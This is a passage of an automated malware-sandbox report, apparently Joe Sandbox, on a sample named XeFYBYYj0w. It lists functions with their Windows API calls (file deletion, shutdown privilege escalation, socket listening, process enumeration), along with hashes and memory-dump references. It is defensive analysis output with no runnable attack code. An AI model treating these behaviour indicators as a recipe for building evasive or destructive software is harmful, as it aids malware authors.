Opcode Fuzzy Hash: b5fa6c38dc07309f43f506a7ac0532cbd5576ac0e1b43c2a369a71a967b36df2
Instruction Fuzzy Hash: A22171357012119FDB10AFA4DD19BAA7BA8FF05751F108026FA46DB261DB30AD42CB54

Function 00A737EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A14743,?,?,00A137AE,?), ref: 00A14770

Part of subcall function 00A74A31: GetFileAttributesW.KERNEL32(?,00A7370B), ref: 00A74A32

FindFirstFileW.KERNEL32(?,?), ref: 00A738A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00A7394B
MoveFileW.KERNEL32(?,?), ref: 00A7395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00A7397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A7399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00A739B9

Strings

\*.*, xrefs: 00A7384E, 00A73857, 00A7386C

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 74329c732e38002f9d58ff939585391cdaf56bce4116343ce53d52a8d46459fe
Instruction ID: 31308b50083fc140f9c2fbbb92d84fd9aa075c5fa1e7392c1fc668b7d07ada72
Opcode Fuzzy Hash: 74329c732e38002f9d58ff939585391cdaf56bce4116343ce53d52a8d46459fe
Instruction Fuzzy Hash: 95515C3290514CAACF05EBA0DEA2DFDB779AF14300F608169E40AB7191EF316F49DB61

Function 00A7F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00A7F440
Sleep.KERNEL32(0000000A), ref: 00A7F470
_wcscmp.LIBCMT ref: 00A7F484
_wcscmp.LIBCMT ref: 00A7F49F
FindNextFileW.KERNEL32(?,?), ref: 00A7F53D
FindClose.KERNEL32(00000000), ref: 00A7F553

Strings

*.*, xrefs: 00A7F425

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 4d1dbdddd98cefbeeb9e034706db06624531dff5ef7ba629a95a78a6498521bb
Instruction ID: 521a8498e018c24143443b73905b0c3ab0df1ecf73efb89eca019597612f4e8e
Opcode Fuzzy Hash: 4d1dbdddd98cefbeeb9e034706db06624531dff5ef7ba629a95a78a6498521bb
Instruction Fuzzy Hash: 7F416C7194421AAFCF14DFA4DC45AEEBBB8FF05314F148466E819A7191EB309B85CF90

Function 00A25760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A258A5
_memmove.LIBCMT ref: 00A258F5
_memmove.LIBCMT ref: 00A2595B

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 4a411cfd9f45a21a1cb411b78a31a71123cc1334265fb5908c38290e584b9b60
Instruction ID: 1f9d75e814e00fed25ef5674aaa517eacb85130d3087b5b290e2d9af4cba4384
Opcode Fuzzy Hash: 4a411cfd9f45a21a1cb411b78a31a71123cc1334265fb5908c38290e584b9b60
Instruction Fuzzy Hash: 0E127970E00619DFDF14DFA9DA81AEEB7F5FF48300F204569E846A7250EB36A991CB50

Function 00A73B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A14743,?,?,00A137AE,?), ref: 00A14770

Part of subcall function 00A74A31: GetFileAttributesW.KERNEL32(?,00A7370B), ref: 00A74A32

FindFirstFileW.KERNEL32(?,?), ref: 00A73B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 00A73BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A73BEA
FindClose.KERNEL32(00000000), ref: 00A73C01
FindClose.KERNEL32(00000000), ref: 00A73C0A

Strings

\*.*, xrefs: 00A73B5B

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: e45b17d21ab000edc38078cec8e2cc0642023d266228d3c80d3c596e71137514
Instruction ID: f16e6f7c4097f2c350d371e3751073257d6539bd2e2bd295484b8da14d94e9cd
Opcode Fuzzy Hash: e45b17d21ab000edc38078cec8e2cc0642023d266228d3c80d3c596e71137514
Instruction Fuzzy Hash: 4D316F320083859FC601EB64CD918EFB7E8AE95314F448D2DF4E992191EB259A09D753

Function 00A751BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00A687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A6882B
Part of subcall function 00A687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A68858
Part of subcall function 00A687E1: GetLastError.KERNEL32 ref: 00A68865

ExitWindowsEx.USER32(?,00000000), ref: 00A751F9

Strings

@, xrefs: 00A751EC
, xrefs: 00A751E7
SeShutdownPrivilege, xrefs: 00A751C9

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: bf940fcb41fa7f41392075ac23ed2470e4661807a771e19127f8b870f926e6e0
Instruction ID: 575cfb65f398f4482ca383a356e1482e7d6535f22284a3b49d1551784460ec71
Opcode Fuzzy Hash: bf940fcb41fa7f41392075ac23ed2470e4661807a771e19127f8b870f926e6e0
Instruction Fuzzy Hash: 3D01D431F916116BE72863789C8AFFA72ACAB05341F21C525F90BE20D3E9A11C0185D4

Function 00A86283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00A862DC
WSAGetLastError.WSOCK32(00000000), ref: 00A862EB
bind.WSOCK32(00000000,?,00000010), ref: 00A86307
listen.WSOCK32(00000000,00000005), ref: 00A86316
WSAGetLastError.WSOCK32(00000000), ref: 00A86330
closesocket.WSOCK32(00000000,00000000), ref: 00A86344

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: ec21559d94e7aa13b3797d1c71b2fcb60e3a7ca47a6ce3f24492f01eb46d0c9d
Instruction ID: d09b6c1cdfadfc33b3134c7d8c3b77d7c97963ac52734808d7a638a05a115211
Opcode Fuzzy Hash: ec21559d94e7aa13b3797d1c71b2fcb60e3a7ca47a6ce3f24492f01eb46d0c9d
Instruction Fuzzy Hash: 6521AD316002049FDB10EFA4C949BAEB7B9EF49720F248169E916EB391CB70AD42CB51

Function 00A25520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00A30DB6: std::exception::exception.LIBCMT ref: 00A30DEC
Part of subcall function 00A30DB6: __CxxThrowException@8.LIBCMT ref: 00A30E01

_memmove.LIBCMT ref: 00A60258
_memmove.LIBCMT ref: 00A6036D
_memmove.LIBCMT ref: 00A60414

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 6a064d31b23c548f511acf84d0dff92c081a84cbc211abef584aef93aea2f355
Instruction ID: 33b162c9c5c22a7886465d79d6d1065a550bcf613b14e1e24892f9e26ba22f88
Opcode Fuzzy Hash: 6a064d31b23c548f511acf84d0dff92c081a84cbc211abef584aef93aea2f355
Instruction Fuzzy Hash: 82029DB0E00219DFCF04DF68DA91AAEBBB5FF44300F148469E80ADB255EB35D995CB91

Function 00A11287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00A119FA
GetSysColor.USER32(0000000F), ref: 00A11A4E
SetBkColor.GDI32(?,00000000), ref: 00A11A61

Part of subcall function 00A11290: DefDlgProcW.USER32(?,00000020,?), ref: 00A112D8

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 2419f0b52502cccdb23453e65d590a60a777665b527dbf79cddedcc7294deeb2
Instruction ID: 8eee8c970c826053f35baa3f6c79c9b237984ae25b926b6b121ecc8f2592296e
Opcode Fuzzy Hash: 2419f0b52502cccdb23453e65d590a60a777665b527dbf79cddedcc7294deeb2
Instruction Fuzzy Hash: A7A15A79216944BEEB28AB385D44EFF3DADDF813C1B24051AF712D5192CB24DD8192F1

Function 00A7BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00A7BCE6
_wcscmp.LIBCMT ref: 00A7BD16
_wcscmp.LIBCMT ref: 00A7BD2B
FindNextFileW.KERNEL32(00000000,?), ref: 00A7BD3C
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00A7BD6C

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 07a4a640205f6af550131e23bbdcce1b534bf3760f14d99f882bcf28f6d39680
Instruction ID: 719ba28e853f6d761e980ce76f83e2a01f0a7064e2e7911e371d264c9f381e5e
Opcode Fuzzy Hash: 07a4a640205f6af550131e23bbdcce1b534bf3760f14d99f882bcf28f6d39680
Instruction Fuzzy Hash: 095190756046019FD724DF68C891E9AB3E4FF49320F14851DF95A873A2DB30ED05CBA1

Function 00A86747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A87D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00A87DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00A8679E
WSAGetLastError.WSOCK32(00000000), ref: 00A867C7
bind.WSOCK32(00000000,?,00000010), ref: 00A86800
WSAGetLastError.WSOCK32(00000000), ref: 00A8680D
closesocket.WSOCK32(00000000,00000000), ref: 00A86821

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 9a4bf109d3eacf19d32f605e4bdf398f321067974afd258d23a12f746a6fc68b
Instruction ID: 664356d47171706129bb7e5afc5b83269d7e8c09e86fb3d4618bd95b35cecac6
Opcode Fuzzy Hash: 9a4bf109d3eacf19d32f605e4bdf398f321067974afd258d23a12f746a6fc68b
Instruction Fuzzy Hash: 5641D175B00210AFEB10BF648D96FBE77A8DF09B54F048458F91AAB3C2CA749D41CB91

Function 00A95376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00A953C5
IsWindowEnabled.USER32 ref: 00A953D3
GetForegroundWindow.USER32(?,?,00000001), ref: 00A953E0
IsIconic.USER32 ref: 00A953EE
IsZoomed.USER32 ref: 00A953FC

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: f4c752fea4262467047863064a4ea9d47e95c34fc0a3ffdaa4cec662ab7069ac
Instruction ID: f60e70393b8b2d158749bbcfd0bc2c1ed27cc504b554b7a1eb113cf60a4c604c
Opcode Fuzzy Hash: f4c752fea4262467047863064a4ea9d47e95c34fc0a3ffdaa4cec662ab7069ac
Instruction Fuzzy Hash: 6911B231B009116FEF225F769C55AAB7BE9EF857A1B514029F846D7241CBB0DC42CBA0

Function 00A680A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A680C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A680CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A680D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A680E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A680F6

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 4196606c78238db0e544bf454a5fedcb4d32956f6dfd9b5f3487651f63a68ad1
Instruction ID: 7f60fe88729c263927195b1a6fbc65904156c96acfc81cfac8f752ace66f742e
Opcode Fuzzy Hash: 4196606c78238db0e544bf454a5fedcb4d32956f6dfd9b5f3487651f63a68ad1
Instruction Fuzzy Hash: 87F04F31340204AFEB104FA5EC8DE6B3BACEF4A755B100226F955C6150DE659C43DA60

Function 00A14B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00A14AD0), ref: 00A14B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00A14B57

Strings

GetNativeSystemInfo, xrefs: 00A14B51
kernel32.dll, xrefs: 00A14B40

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 979a64eaf9692d02a6e1fc3388ccc36bf1ba5133ee31150a3869f5eb727dd913
Instruction ID: 36912b23429e82be27180aebb4e3a561428be766b2d6796db92f18451a5b3337
Opcode Fuzzy Hash: 979a64eaf9692d02a6e1fc3388ccc36bf1ba5133ee31150a3869f5eb727dd913
Instruction Fuzzy Hash: 19D01274B14713DFDB20DF75E858B4676E4AF05351B25CC3A9485D6150DA70D4C0C654

Function 00A23030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 04a2e6b4cda826428c233494a5e02a519dba84766bac668d29feaefddae7d99b
Instruction ID: d3d2dca6d90a4ae9e62366634c0c757cef771713f9b2cf64a78b99544045833c
Opcode Fuzzy Hash: 04a2e6b4cda826428c233494a5e02a519dba84766bac668d29feaefddae7d99b
Instruction Fuzzy Hash: B1229D726083109FCB24DF18D991BABB7F4BF85310F50492DF89697291DB34E948CB92

Function 00A8EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00A8EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 00A8EE4B

Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22

Process32NextW.KERNEL32(00000000,?), ref: 00A8EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00A8EF1A

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: d25a9ad4a1b998759edc7c9d1fe384e3572c24906b1aa2fd16f0a1ba1e8bd319
Instruction ID: 613079677e60e9c50e139a0489c321523d584749c94733985b61dee3682f8070
Opcode Fuzzy Hash: d25a9ad4a1b998759edc7c9d1fe384e3572c24906b1aa2fd16f0a1ba1e8bd319
